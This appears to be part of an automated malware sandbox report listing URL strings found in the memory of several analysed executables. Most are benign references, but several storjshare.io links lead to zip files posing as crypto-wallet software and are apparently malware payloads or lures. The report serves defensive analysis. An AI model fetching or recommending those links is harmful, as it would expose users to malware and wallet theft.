                        Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE7C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADE70000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE88C000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
                        Source: t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE88C000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
                        Source: b1dc05533c.exe, 00000014.00000003.269558258136.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269557715652.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                        Source: b1dc05533c.exe, 00000014.00000003.269558258136.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269557715652.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                        Source: b1dc05533c.exe, 00000014.00000003.269558258136.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
                        Source: b1dc05533c.exe, 00000014.00000003.269558258136.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269557715652.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558011592.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.M
                        Source: t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail
                        Source: dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail$
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
                        Source: dwVrTdy.exe, 00000026.00000003.269575988391.000002243263A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settings/crx
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settings4D9F34260
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF0C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622740092.00000247ADF21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settings:
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsCD891A5BF2880~A
                        Source: dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsE
                        Source: AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsF2F0EF0727D4Cr
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mailB
                        Source: AzVRM7c.exe, 00000029.00000003.269622740092.00000247ADF27000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622880866.00000247ADF38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mailM
                        Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664911899.000001B3EE938000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667320015.000001B3EE954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mailk
                        Source: AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mailq
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269641953537.0000022434300000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.000002243266F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635692000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF59000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
                        Source: t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
                        Source: dwVrTdy.exe, 00000026.00000003.269576629725.00000224326BB000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576581671.00000224326AC000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576528251.00000224326A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsA01E4E5
                        Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsA80DFEA
                        Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsD19293F
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsD68F1B5o0
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools/
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
                        Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
                        Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883885644.00000178EAF8C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269875318381.00000178EAE7C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269871977181.00000178EAE78000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883457246.00000178EAE80000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868181305.00000178EADF1000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269865053455.00000178EAF6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                        Source: t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665172986.000001B3EE8F5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665002237.000001B3EE8EB000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666848962.000001B3EE8FB000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
                        Source: t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
                        Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667370374.000001B3EE94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js5B84B98D
                        Source: dwVrTdy.exe, 00000026.00000003.269576629725.00000224326BB000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576581671.00000224326AC000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576528251.00000224326A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js5B84B98DE
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsBE261D66
                        Source: AzVRM7c.exe, 00000029.00000003.269621997024.00000247ADEC6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADEC7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621655336.00000247ADEC4000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsdStorageted
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621997024.00000247ADEC6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADEC7000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621655336.00000247ADEC4000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsoo
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
                        Source: dwVrTdy.exe, 00000028.00000003.269592469825.000002563560C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org:443
                        Source: LoaderClient.exe, 0000002F.00000003.269821634799.00000178EA79F000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869132278.00000178EA7A2000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269819746162.00000178EA771000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269820766105.00000178EA772000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269819217625.00000178EA72B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852243411.00000178EA731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
                        Source: b1dc05533c.exe, 00000014.00000003.269584211913.0000000003EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
                        Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883362038.00000178EAE67000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868015957.00000178EAEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/
                        Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
                        Source: LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269822195815.00000178EAD3A000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269856585205.00000178EA3B8000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269853538063.00000178EA3B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
                        Source: dwVrTdy.exe, 00000028.00000003.269592469825.000002563560C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org:443
                        Source: b1dc05533c.exe, 00000014.00000003.269558324452.0000000003A20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.c(om/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/$ip
                        Source: dwVrTdy.exe, 00000028.00000003.269594984016.0000025635628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0
                        Source: AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/5
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/9
                        Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575078876.0000022432692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/M
                        Source: dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/U
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
                        Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432658000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575810521.000002243265A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/eda
                        Source: dwVrTdy.exe, 00000026.00000003.269575185370.0000022432645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575244843.0000022432655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/eda)R
                        Source: dwVrTdy.exe, 00000026.00000003.269574824187.0000022432641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/eda)Rw
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574467579.000002243262F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574542549.000002243264E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/eda)R~
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
                        Source: dwVrTdy.exe, 00000028.00000003.269594135639.000002563561D000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.000002563561D000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594706087.000002563561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/ieda
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
